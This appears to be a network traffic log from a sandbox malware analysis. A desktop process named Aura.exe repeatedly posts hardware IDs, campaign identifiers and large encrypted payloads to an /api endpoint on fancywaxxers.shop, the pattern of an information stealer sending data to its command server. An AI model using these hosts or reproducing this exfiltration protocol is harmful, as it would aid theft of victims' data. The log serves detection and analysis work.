2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 64 61 69 53 4a 37 39 79 6b 68 57 67 35 65 53 51 44 35 33 61 43 46 54 70 71 68 48 72 59 4d 51 55 49 49 47 46 38 7a 66 44 32 30 6b 6d 75 55 49 6e 72 43 4e 61 46 71 50 68 4a 4a 61 62 55 6c 6d 49 33 2b 75 75 52 47 78 73 31 30 42 68 46 42 63 6d 61 5a 59 62 53 53 4f 35 51 69 65 69 6f 31 2b 58 72 71 52 68 46 38 38 44 43 73 6f 53 2b 48 6d 52 34 7a 38 54 42 4f 64 48 31 69 46 32 46 5a 31 4f 71 6a 6c 57 38 69 69 6d 6d 74 4c 6e 70 2b 5a 52 30 49 43 4d 33 73 50 38 2b 78 56 34 4b 4d 65 44 37 4a 53 46 35 57 6d 54 68 51 36 31 72 4d 51 68 76 66 45 4b 45 2f 56 79 74 55 52 66 31 42 35 4b 56 36 33 76 55 43 4d 67 6e 6b 47 68 78 74 48 6b 2f 45 5a 62 57 33 57 71 68 43 47 6e 4d 70 68 57 6f 36 44 67 31 74 73 52 53 73 51 45 2b 47 6d 52 2b 72 38 61 78 4f 44 45 6c 43 43 39 31 73 4b Data Ascii: daiSJ79ykhWg5eSQD53aCFTpqhHrYMQUIIGF8zfD20kmuUInrCNaFqPhJJabUlmI3+uuRGxs10BhFBcmaZYbSSO5Qieio1+XrqRhF88DCsoS+HmR4z8TBOdH1iF2FZ1OqjlW8iimmtLnp+ZR0ICM3sP8+xV4KMeD7JSF5WmThQ61rMQhvfEKE/VytURf1B5KV63vUCMgnkGhxtHk/EZbW3WqhCGnMphWo6Dg1tsRSsQE+GmR+r8axODElCC91sK
2025-01-05 18:36:57 UTC	1031	IN	Data Raw: 6a 50 71 49 59 6f 45 39 57 48 6e 6c 70 36 54 33 35 67 54 4c 65 39 45 62 58 77 56 67 47 41 45 42 65 72 71 46 59 31 59 38 37 6c 5a 64 32 72 68 47 39 4c 68 4e 2b 31 58 58 42 42 5a 79 35 61 34 66 42 48 74 50 77 47 51 38 4e 63 55 34 57 6d 54 6e 31 78 7a 66 41 44 69 66 58 59 64 78 4f 4d 30 6f 4d 57 4a 42 41 6c 62 30 2f 68 35 6b 66 31 76 30 77 43 69 78 39 42 6c 36 45 6f 45 79 4b 62 71 68 7a 51 72 6f 70 76 54 59 4f 4a 32 56 35 2f 57 48 45 52 59 34 71 79 41 62 57 6d 57 52 61 72 50 42 66 61 70 68 6c 74 65 36 2f 6c 47 4a 36 61 78 43 68 46 31 63 72 56 59 33 39 4d 5a 53 68 4c 73 50 4d 76 6b 59 5a 6b 55 71 45 62 51 74 62 53 45 54 30 79 6e 61 68 63 6e 75 76 4b 62 68 33 4e 77 74 73 57 65 46 4d 72 64 77 33 7a 35 56 4c 68 36 77 35 43 6b 6c 4a 4f 31 50 42 57 64 58 48 59 35 Data Ascii: jPqIYoE9WHnlp6T35gTLe9EbXwVgGAEBerqFY1Y87lZd2rhG9LhN+1XXBBZy5a4fBHtPwGQ8NcU4WmTn1xzfADifXYdxOM0oMWJBAlb0/h5kf1v0wCix9Bl6EoEyKbqhzQropvTYOJ2V5/WHERY4qyAbWmWRarPBfaphlte6/lGJ6axChF1crVY39MZShLsPMvkYZkUqEbQtbSET0ynahcnuvKbh3NwtsWeFMrdw3z5VLh6w5CklJO1PBWdXHY5
2025-01-05 18:36:57 UTC	1369	IN	Data Raw: 32 34 39 31 0d 0a 6d 48 5a 47 44 31 51 34 73 45 44 42 36 44 76 62 75 56 61 33 79 52 31 43 62 58 41 2f 47 71 46 59 2f 59 38 37 6c 46 39 32 33 6d 47 35 65 67 35 48 53 61 45 4a 6b 61 43 68 62 6f 72 41 51 6f 2f 35 78 45 34 59 51 57 35 50 77 4b 42 4d 32 6c 61 74 65 32 62 4f 62 4b 42 50 56 6e 64 55 4f 52 51 4a 36 4a 56 72 74 39 6b 75 6a 72 31 41 62 6d 78 73 58 71 36 68 57 4e 57 50 4f 35 57 58 64 71 34 52 76 53 34 54 66 73 31 56 37 52 47 67 68 53 72 44 2b 53 66 4b 36 48 6b 6a 66 55 68 65 51 39 31 5a 31 63 38 54 2b 42 59 33 79 32 6a 70 43 32 34 76 56 51 44 77 61 4f 47 45 64 73 2f 35 66 38 76 74 51 48 59 77 66 57 5a 66 30 42 43 73 67 67 4b 59 58 34 4a 75 76 5a 56 43 51 6e 4a 4a 6f 51 6d 4e 68 50 31 43 75 75 54 6d 4d 69 30 38 58 6e 56 35 78 6c 2f 41 56 62 57 33 57 Data Ascii: 2491mHZGD1Q4sEDB6DvbuVa3yR1CbXA/GqFY/Y87lF923mG5eg5HSaEJkaChborAQo/5xE4YQW5PwKBM2late2bObKBPVndUORQJ6JVrt9kujr1AbmxsXq6hWNWPO5WXdq4RvS4Tfs1V7RGghSrD+SfK6HkjfUheQ91Z1c8T+BY3y2jpC24vVQDwaOGEds/5f8vtQHYwfWZf0BCsggKYX4JuvZVCQnJJoQmNhP1CuuTmMi08XnV5xl/AVbW3W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:36:58 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XU6VIPM8FK357X583 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18162 Host: fancywaxxers.shop
2025-01-05 18:36:58 UTC	15331	OUT	Data Raw: 2d 2d 58 55 36 56 49 50 4d 38 46 4b 33 35 37 58 35 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 58 55 36 56 49 50 4d 38 46 4b 33 35 37 58 35 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 55 36 56 49 50 4d 38 46 4b 33 35 37 58 35 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 Data Ascii: --XU6VIPM8FK357X583Content-Disposition: form-data; name="hwid"3ED8B6EC8FAF248D09E39FEBDE2EA801--XU6VIPM8FK357X583Content-Disposition: form-data; name="pid"2--XU6VIPM8FK357X583Content-Disposition: form-data; name="lid"BVnUqo--@hitok41
2025-01-05 18:36:58 UTC	2831	OUT	Data Raw: a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de Data Ascii: jf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
2025-01-05 18:36:59 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:36:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=em0p0i75t2cj7af0n3a4eqa71s; expires=Thu, 01 May 2025 12:23:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GPvn2h7UtE7eHbTkCIQgY2SPo2QA%2F47UcjXoGKUHlG6fR4QRTPB6RzH4ohB%2FQ8buB%2Fu3iCIqP2z4rwqa%2B9fLA27qL5w0r5derxfD8vrxHpVeFiT38S0WqxBYgoMa9qXrwr2zQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593b17d978c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2058&rtt_var=781&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19124&delivery_rate=1418853&cwnd=223&unsent_bytes=0&cid=f0cb65fcb170b3ad&ts=665&x=0"
2025-01-05 18:36:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:36:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:36:59 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=N8DPAKDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8729 Host: fancywaxxers.shop
2025-01-05 18:36:59 UTC	8729	OUT	Data Raw: 2d 2d 4e 38 44 50 41 4b 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 4e 38 44 50 41 4b 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 38 44 50 41 4b 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 4e 38 44 50 41 4b 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --N8DPAKDAContent-Disposition: form-data; name="hwid"3ED8B6EC8FAF248D09E39FEBDE2EA801--N8DPAKDAContent-Disposition: form-data; name="pid"2--N8DPAKDAContent-Disposition: form-data; name="lid"BVnUqo--@hitok4111--N8DPAKDAContent-Dis
2025-01-05 18:37:00 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:37:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3v4aou2rh7bd8vf3mg8eg1ki2g; expires=Thu, 01 May 2025 12:23:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyp9IuKevX4d%2F4rqNY4LGFwzD9lO9sgFcNknyxRZ40phV9WWGhyjCjFb9hpZo5tcVi1Ad7cyZc8%2BULmT%2Bd2A7vBdus5P0y2sJQLSGJpC1k6of0RSMn2XT1Wnk53JxjEV2jf06Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593b88ea243ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1673&rtt_var=638&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9659&delivery_rate=1701631&cwnd=230&unsent_bytes=0&cid=84de02fb9b3730f9&ts=799&x=0"
2025-01-05 18:37:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:37:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:37:00 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XI0FJV2UZOAP3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20412 Host: fancywaxxers.shop
2025-01-05 18:37:00 UTC	15331	OUT	Data Raw: 2d 2d 58 49 30 46 4a 56 32 55 5a 4f 41 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 58 49 30 46 4a 56 32 55 5a 4f 41 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 49 30 46 4a 56 32 55 5a 4f 41 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 58 49 30 46 4a 56 Data Ascii: --XI0FJV2UZOAP3Content-Disposition: form-data; name="hwid"3ED8B6EC8FAF248D09E39FEBDE2EA801--XI0FJV2UZOAP3Content-Disposition: form-data; name="pid"3--XI0FJV2UZOAP3Content-Disposition: form-data; name="lid"BVnUqo--@hitok4111--XI0FJV
2025-01-05 18:37:00 UTC	5081	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-05 18:37:01 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tnhif0r72b4shh9oluq261i7qu; expires=Thu, 01 May 2025 12:23:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXY5wdyQvcAbbmqbA90sycdIQ%2B%2FPvjGNBToejWfZAn%2FvCKTMaz9tt17jdmwXc8KLDYknvDIQETpdqp4Mx7IPU0EWRfWn%2Bwtk8T9Ax%2FGDRvZ8%2F75ZnhBdoZysuP1y9zZmSWH6EA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593c13b760f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1479&rtt_var=561&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21370&delivery_rate=1974306&cwnd=231&unsent_bytes=0&cid=985ab5b5e67e5428&ts=636&x=0"
2025-01-05 18:37:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:37:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:37:02 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AHHDWJP8BVY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 948 Host: fancywaxxers.shop
2025-01-05 18:37:02 UTC	948	OUT	Data Raw: 2d 2d 41 48 48 44 57 4a 50 38 42 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 41 48 48 44 57 4a 50 38 42 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 48 48 44 57 4a 50 38 42 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 0d 0a 2d 2d 41 48 48 44 57 4a 50 38 42 56 59 0d Data Ascii: --AHHDWJP8BVYContent-Disposition: form-data; name="hwid"3ED8B6EC8FAF248D09E39FEBDE2EA801--AHHDWJP8BVYContent-Disposition: form-data; name="pid"1--AHHDWJP8BVYContent-Disposition: form-data; name="lid"BVnUqo--@hitok4111--AHHDWJP8BVY
2025-01-05 18:37:03 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:37:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tpbvh3ng2c4v04v3oq6nl3f5pi; expires=Thu, 01 May 2025 12:23:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MymZHFzbtTSO4h1dP2Tinb2h0F7mihSBA4RwT6AKIZztRyMsm7AkGNFIcrZy9rihEoYalP1KYOtzFgtU2k7jp%2FFT7UseE6LTXTIH4QNYYB7axXsSqJxo98BuF98SYmKW3druVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593ccdc9a8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=751&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1858&delivery_rate=1456359&cwnd=223&unsent_bytes=0&cid=77438395779a6769&ts=1122&x=0"
2025-01-05 18:37:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:37:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:37:04 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IKAVSKJHB7TUENXL0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587863 Host: fancywaxxers.shop
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 2d 2d 49 4b 41 56 53 4b 4a 48 42 37 54 55 45 4e 58 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 49 4b 41 56 53 4b 4a 48 42 37 54 55 45 4e 58 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 4b 41 56 53 4b 4a 48 42 37 54 55 45 4e 58 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 Data Ascii: --IKAVSKJHB7TUENXL0Content-Disposition: form-data; name="hwid"3ED8B6EC8FAF248D09E39FEBDE2EA801--IKAVSKJHB7TUENXL0Content-Disposition: form-data; name="pid"1--IKAVSKJHB7TUENXL0Content-Disposition: form-data; name="lid"BVnUqo--@hitok41
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 36 4a 41 30 bf 00 25 38 ad 88 f6 c1 78 c1 41 b0 5b ba 97 7c 14 4a a5 2c eb 91 8d 24 f7 d8 ce 7b 7f fa 9a 78 af d4 43 cf 0a 74 ea c7 d4 bd d3 1c 4e 15 3e af 6d 23 08 f9 5d 54 22 25 96 a4 2c 02 1d 54 6b 77 ae 0b 2a ad f3 ac b8 d0 1f e0 c5 42 96 0e 56 5a a2 e5 00 28 3c 4e 89 5e 47 f5 fd f2 e8 8f 2c 50 1e d3 18 2d c0 44 ad 4b 05 29 35 e7 8b fc 0c 51 31 c3 89 e1 0e 91 92 e8 98 7b c4 97 95 04 6e f5 65 a3 d8 a9 39 79 c3 6b 09 99 6e b5 21 7b 8d 99 d6 36 aa 7b e3 9c 35 bb c4 f2 f4 e1 21 7e 84 05 6b 7a 8d 5d b0 82 e0 d6 cf 3c 36 b4 8c c1 d2 0a d7 09 83 59 df b6 1f 57 30 40 7e ae ba c8 f4 9e 2d 3f 6b be cf 42 60 6e 7c e0 8b 25 0c e0 db e2 0d 02 7a e2 86 04 20 b0 08 8c ed 98 2d af 4f b0 f2 b9 80 e3 bf 28 0a 7a 07 c5 c9 82 aa 63 f1 5b 42 3b 45 dc a0 45 cd 13 99 d0 c5 Data Ascii: 6JA0%8xA[\|J,${xCtN>m#]T"%,Tkw*BVZ(<N^G,P-DK)5Q1{ne9ykn!{6{5!~kz]<6YW0@~-?kB`n\|%z -O(zc[B;EE
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 7e a6 c5 bb 9a f3 4b a9 5f f1 43 df b0 5b f5 b6 af db 5a 10 fb 03 16 8d 58 eb f6 a2 33 db 3f 2e 95 35 ed f2 c8 a7 b5 09 8b fb 49 62 01 ad f3 e5 07 31 b6 0d 17 52 59 f2 a0 66 4c 65 5d a3 cd e9 39 b4 be ec d9 7c 1b 14 dd 21 66 49 92 b2 f8 ef 48 fb 72 90 be f5 91 63 15 c4 05 a8 d9 e2 09 05 50 39 1f b0 ff 5d 78 79 02 f3 f3 10 f3 04 0f 68 a4 50 ff 77 63 c9 33 10 55 1c bf 1f b1 56 48 81 a9 15 4b c1 27 88 dd 4e b2 bf 75 8a 4b ad 1b 03 50 4b df 27 33 3c 77 0f 4f af 67 39 73 8f 95 4b 36 01 de 5b a4 ab 40 f7 10 f5 f7 06 7b 5c 6b 5d 88 30 a1 18 05 3c 64 7f 5b 49 6f 42 dd be 6a 84 c7 ba 91 15 a1 21 6d a4 de 00 55 5b d2 98 25 3b 0e 89 c0 69 b8 7b 2e 9c a2 e3 94 68 60 f1 4b 05 85 9d 38 ed 89 d8 3c e6 36 df ab 65 60 7f 9e 44 ec 0f f2 5a 3f c1 75 11 c9 11 52 cb 76 09 31 Data Ascii: ~K_C[ZX3?.5Ib1RYfLe]9\|!fIHrcP9]xyhPwc3UVHK'NuKPK'3<wOg9sK6[@{\k]0<d[IoBj!mU[%;i{.h`K8<6e`DZ?uRv1
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: a5 cb c3 bc ea 45 d1 56 e8 6c d0 89 fa 6c ed a1 3a 12 51 8c 1a ef 2f e3 4a ae ec cd b9 3c b5 3e a1 b5 f8 56 ad d3 90 78 66 2c 27 09 e1 b1 a6 92 52 9e fa d2 02 73 75 12 31 2e ed eb 34 c4 7a 9f 4c 68 d0 33 8e e6 e6 e3 66 9c b8 2a 1d 0d 79 9d 86 2e b9 f5 6e 4a 50 b4 4f 32 d3 1c 18 09 aa 05 b0 65 4e bc 2a 0b c8 df 9e bb 17 17 02 03 cf a5 15 40 62 52 17 7d cb 85 bf fb fa d2 76 e1 e8 99 31 27 61 b0 5a c2 3a 92 54 fe 53 d9 9a d3 e7 53 b2 8f 15 b9 9e 8d ae 38 9a 2b c5 63 94 5c 5d c2 a9 00 7d 4c 22 14 aa 15 c3 0e ce 49 5b 7f 46 e7 fe f7 35 82 97 4a 22 e0 69 7d 25 95 71 9b 53 5f e8 15 1b c7 64 81 ec 25 00 1d 12 79 2b cb 68 cd fd 2d 25 26 4a 66 e3 ee 7f 5d 1a 1d 86 a5 37 dd 17 0b 76 7f 02 d3 2b 9f bf 8a a2 f9 1d 96 6e af ef af cb b6 d9 ad 04 c0 2e 89 ad 71 1b dc 95 Data Ascii: EVll:Q/J<>Vxf,'Rsu1.4zLh3fy.nJPO2eN@bR}v1'aZ:TSS8+c\]}L"I[F5J"i}%qS_d%y+h-%&Jf]7v+n.q
